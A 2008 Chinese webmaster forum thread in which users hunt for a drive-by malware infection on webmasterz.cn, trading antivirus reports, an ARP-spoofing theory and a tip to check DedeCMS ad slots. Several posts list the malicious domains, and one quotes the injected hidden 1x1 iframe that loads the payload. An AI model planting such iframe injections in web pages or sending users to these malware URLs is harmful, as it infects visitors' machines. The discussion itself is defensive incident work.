webmasterz.cn上的挂马挂在哪了我怎么查了半天查不到？

静水流深 · 发表于 2008-1-9 13:35:38

有没高手指点下？

zivchiu · 发表于 2008-1-9 13:47:29

我也不知道哪里被挂

fgd117 · 发表于 2008-1-9 13:59:09

晕,连静水的站都能被挂马呀,这个人可真是厉害!

le19754 · 发表于 2008-1-9 14:21:51

请挂马的主动告诉站长马挂哪了，怎么挂的。

rooktong · 发表于 2008-1-9 14:22:44

原帖由 le19754 于 2008-1-9 14:21 发表
请挂马的主动告诉站长马挂哪了，怎么挂的。

上帝 · 发表于 2008-1-9 14:25:42

我估计是他系统中毒了，他系统内核被病毒改了~

[ 本帖最后由上帝于 2008-1-9 14:26 编辑 ]

fffccc · 发表于 2008-1-9 14:59:53

论坛有没有被挂马？

smilefish · 发表于 2008-1-9 15:07:56

一上去卡巴就乱叫

Q2C · 发表于 2008-1-9 15:11:33

MYOK168 · 发表于 2008-1-9 15:17:00

原帖由 le19754 于 2008-1-9 14:21 发表
请挂马的主动告诉站长马挂哪了，怎么挂的。

:

cooleezq · 发表于 2008-1-9 15:18:39

我也查不到

1983apple · 发表于 2008-1-9 15:32:03

我上去没见卡芭报警啊,怎么回事

happy61 · 发表于 2008-1-9 16:25:03

愤怒

[ 本帖最后由 happy61 于 2008-1-9 16:30 编辑 ]

20082008 · 发表于 2008-1-9 16:33:32

没装REAL就没事，好在我重新装的系统

:

279970049 · 发表于 2008-1-9 16:46:18

我说怎么我一上去就死机了,我挂马的先人:mad:

aja0x · 发表于 2008-1-9 17:41:28

不用查了，多半是ARP～～机器什么时候搬国内了？

不是你服务器原因，机房网络环境问题

pwh1888 · 发表于 2008-1-9 18:18:19

找到挂马证据，报给网监，让挂马者坐牢。

mandy · 发表于 2008-1-9 19:37:58

真的有哦，是特洛伊木马．害我不敢进去学习了．是在篇关于新手的贴子，因为我就是个新手，点的都是教新手的文章．　　

fy20052 · 发表于 2008-1-9 20:04:44

好像一切正常啊，---

flycat · 发表于 2008-1-9 21:21:06

怪不得一上去就慢得要命啊

卡丁车 · 发表于 2008-1-9 21:39:03

..不信邪....跑上去一看...嗷嗷卡的说....

101300 · 发表于 2008-1-10 00:09:56

没有的事情...

我爱格格 · 发表于 2008-1-10 09:28:26

贵网出现的这种arp攻击，会影响一些网速，他的模式是这样的：按照常理，服务器出外网应该走网关出去，但是由于机房内有人中了arp病毒，进行arp攻击以后，他就会劫持网关，即把自己虚拟成网关的mac，然后，贵网的服务器这时就不会从网关出去，而是通过那台中毒的机器，然后再通过网关出去

我爱格格 · 发表于 2008-1-10 09:30:46

个人比较喜欢用antiarp
http://www.antiarp.com/download.htm

loveams · 发表于 2008-1-10 10:31:09

唉，几天没上了.
我那天上去第一次发现有毒 .. 过了个把小时我想去看看到底哪被挂了马.看了代码没有.
发现卡巴没有报了.
不过页面嗷嗷的卡.
偶也不知原因.
用微点查
貌似多了个服务.
c:/windows/temp/****.exe
不知各位有没有这个现像.
我的系统是当天刚装好的.

xiaoqiu · 发表于 2008-1-10 11:32:25

没有这种情况啊

上帝 · 发表于 2008-1-10 12:24:32

http://www.985676.cn/encrypt/mm.htm
http://ppp.749571.com/dm/rr.htm
http://ppp.749571.com/dm/rl.htm

这是我抓到的几个，还有几个没有记下来
我冒着机器中毒的危险记下来的~

[ 本帖最后由上帝于 2008-1-10 12:26 编辑 ]

le19754 · 发表于 2008-1-10 12:28:28

原帖由上帝于 2008-1-10 12:24 发表
 http://www.985676.cn/encrypt/mm.htm
http://ppp.749571.com/dm/rr.htm
http://ppp.749571.com/dm/rl.htm

这是我抓到的几个，还有几个没有记下来
我冒着机器中毒的危险记下来的~

干掉耶稣，我就是上帝！
你还有什么好怕的。

上帝 · 发表于 2008-1-10 16:35:24

楼上的，谢谢咯~~~

freelzyr · 发表于 2008-1-10 16:47:23

进dede后台
检查 ad_js.php?aid=1
ad_js.php?aid=2
ad_js.php?aid=3
ad_js.php?aid=4

这几个广告里面的代码
在这几个掉茅厕位里面含有木马的代码

上帝 · 发表于 2008-1-10 16:50:35

请老大仔细的查查吧，刚又发现了几个，全是免杀的~~一个劲的往外蹦，但是我的卡卡即不报~~
http://ppp.749571.com/dm/test.htm
http://www.985676.cn/encrypt/mm.htm
这两个是免杀的，还有几个没记下来，
这挂马的兔崽子有一手，隐藏的很好啊~~一般人都看不出来~

sby2000 · 发表于 2008-1-10 17:01:37

会在C盘下产生 CRESS1.EXE
然后增加IE的BHO的木马还释放驱动

sby2000 · 发表于 2008-1-10 17:34:02

昏他藏得好隐秘找到了放毒得地方了

iframe src=h t t p://w w w.9856 76.cn/encrypt/mm.htm width=1 height=1></iframe>
然后再这个地址转到ppp.749571.co m/dm/test.htm
为了跟踪这个病毒自己失误的。。。。哎。修复中ing。。。。
静水赶快清理了吧

firstsee2008 · 发表于 2008-1-10 18:00:24

原帖由 20082008 于 2008-1-9 16:33 发表
没装REAL就没事，好在我重新装的系统:

说的没错

静水流深 · 发表于 2008-1-11 02:27:32

原帖由 freelzyr 于 2008-1-10 16:47 发表
进dede后台
检查 ad_js.php?aid=1
ad_js.php?aid=2
ad_js.php?aid=3
ad_js.php?aid=4

这几个广告里面的代码
在这几个掉茅厕位里面含有木马的代码

这个检查了没有的

上帝 · 发表于 2008-1-11 09:09:11

原帖由 静水流深 于 2008-1-11 02:27 发表

这个检查了没有的

我看过了，有挂马的代码，代码已经在你的另一个贴子里贴出来了

freelzyr · 发表于 2008-1-11 12:44:57

原帖由 静水流深 于 2008-1-11 02:27 发表

这个检查了没有的

木马就是在这里里啊
在后台的掉茅厕位设置那
里

loveams · 发表于 2008-1-30 10:38:22

现在明了.
有人收流量做ppp.749571.co m的..
最近被挂马的话. 都改成js了. 不用iframe了

kick · 发表于 2008-1-30 11:53:15

菜鸟,怕怕,不敢看,啥时好了说一声,我再去看风景

webmasterz.cn上的挂马挂在哪了 我怎么查了半天查不到？

评分

webmasterz.cn上的挂马挂在哪了我怎么查了半天查不到？